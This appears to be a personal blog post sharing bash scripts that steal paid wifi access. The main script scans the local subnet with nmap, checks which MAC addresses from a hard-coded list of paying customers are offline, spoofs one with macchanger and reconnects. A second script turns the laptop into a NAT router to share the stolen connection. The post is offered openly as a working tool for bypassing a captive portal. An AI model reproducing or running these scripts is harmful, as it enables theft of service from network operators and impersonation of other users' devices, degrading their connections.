Synopsis
Getting free wifi from an open network that takes you to a “pay to use page”.
History
I am living for a time being on a site that has a wifi service that you pay to use. Having my own Sat connection meant that I did not need it in the beginning. But seeing as I used up my 10 gig allowance in 10 days and the connection goes to usable crap speed, I decided to have a look at the site wifi. Finding the login page wasn’t SSL then I originally though it would be a case of leaving a Kali laptop running airodump on till it captured a password. I did so but seeing as I had a load of captured http traffic I thought that MAC address spoofing may get some results. It did! But by googling ‘mac address spoofing for free wifi‘ shows that I am by no means the first. This appears to be a very well known exploit. So what I am sharing here is a script that will come in of use in getting the free wifi
Requirements
- Kali Linux. A backtrack installation would be ok too.
Code (bash)
#!/bin/bash
#my mac a0:f3:c1:0e:b3:9c
#10.0.1.x
#C8:02:10:34:02:0A
#AC:A2:13:28:02:F6
#F4:1B:A1:A0:D3:4B
conn[0]=”00:0D:A3:11:1A:53″
conn[1]=”00:0F:04:B3:94:04″
conn[2]=”00:15:6D:DA:BC:66″
conn[3]=”00:15:AF:46:F1:15″
conn[4]=”00:16:6F:CA:CE:8A”
conn[5]=”00:1A:EF:36:A3:25″
conn[6]=”00:1A:EF:36:A7:41″
conn[7]=”00:E3:B2:23:0A:4F”
conn[8]=”24:A4:3C:AE:2E:EC”
conn[9]=”30:10:B3:06:63:4E”
conn[10]=”3C:E0:72:BC:F5:87″
conn[11]=”44:91:DB:23:4C:6F”
conn[12]=”64:70:02:57:19:1A”
conn[13]=”64:70:02:57:35:FB”
conn[14]=”68:48:98:4B:87:47″
conn[15]=”68:A3:C4:51:B9:B9″
conn[16]=”6C:B7:F4:78:19:FF”
conn[17]=”94:35:0A:EE:CB:C1″
conn[18]=”AC:A2:13:28:02:F6″
conn[19]=”C8:02:10:34:02:0A”
conn[20]=”CC:52:AF:12:21:17″
conn[21]=”F4:EC:38:8F:59:7C”
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do
test[$a]=false
done
conn[99]=false
last=99
while true
do
echo “Pinging…”
rm capture/ping.txt
ping -c 5 8.8.8.8 > capture/ping.txt
if grep “100% packet loss” capture/ping.txt || [ $(wc -c “capture/ping.txt” | cut -f 1 -d ‘ ‘) -eq 0 ]
then
if [ $last=99 ]
then
ifconfig wlan2 down
macchanger -p wlan2 > /dev/null
nmcli con up id Legal
echo “Scanning site”
nmap -vv –open -n -sn 10.0.0.0/24 > capture/ls1.txt
nmap -vv –open -n -sn 10.0.1.0/24 >> capture/ls1.txt
fi
found=false
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do
if ! grep -q ${conn[$a]} capture/ls1.txt && ! [ $last = $a ] && [ ${test[$a]} = false ]
then
echo “”
echo “${conn[$a]} ($a) is availiable”
echo “”
ifconfig wlan2 down
macchanger -m ${conn[$a]} wlan2
nmcli con up id Legal
found=true
last=$a
test[$a]=true
break
fi
done
if ! $found
then
echo “”
echo “** No account free !!”;
echo “”
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do
test[$a]=false
last=99
done
fi
else
sleep 25
fi
done
What do it do?
- It does an nmap (ping) scan of the site then checks if any predifined MAC address is not being used, changes the mac of wlan2 to that and connects
- It pings 8.8.8.8 every 30 seconds and if 5 of 5 packets are lost then it initiates a scan
- If all are in use or have been tried it cycles back to the start.
You will need to populate the initial list of mac addresses by doing a nmap yourself to your local subnet.
Why is this better than just spoofing a mac ?
If you just spoof a mac of an existing client I have got the net but it is very patchy. This is no doubt down to that mac address being associated to 2 different stations with the same IP. Finding a load of MAC addresses of ppl who have paid and then using them when they are not, has proven to be the best approach.
Building on this
I built the Kali linux laptop into a router with the following commands
#!/bin/bash
# Start
# Configure IP address for WLAN
sudo ifconfig eth0 192.168.1.100
# Start DHCP/DNS server
sudo service dnsmasq restart
# Enable NATiptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan2 -j MASQUERADE
iptables --append FORWARD --in-interface wlan2 -j ACCEPT
#torrent
#iptables -t nat -A PREROUTING -p tcp --dport 53781 -j DNAT --to-destination 192.168.1.99
#iptables -A FORWARD -s 192.168.1.99 -p tcp --dport 53781 -j ACCEPT
# Enable routing
sysctl net.ipv4.ip_forward=1
# Run access point daemon
# sudo hostapd /etc/hostapd.conf
nmap -vv --open -sn 10.0.0.0/24 -n -oN capture/scan.txt --append-output
nmap -vv --open -sn 10.0.1.0/24 -n -oN capture/scan.txt --append-output
ping 8.8.8.8
The above will share a wlan2 interface over eth0. There is code in there that, if uncommented share to a hosted network. If the code is horrible for some reason it’s as the last time I scripted anything under bash was around 6 years ago.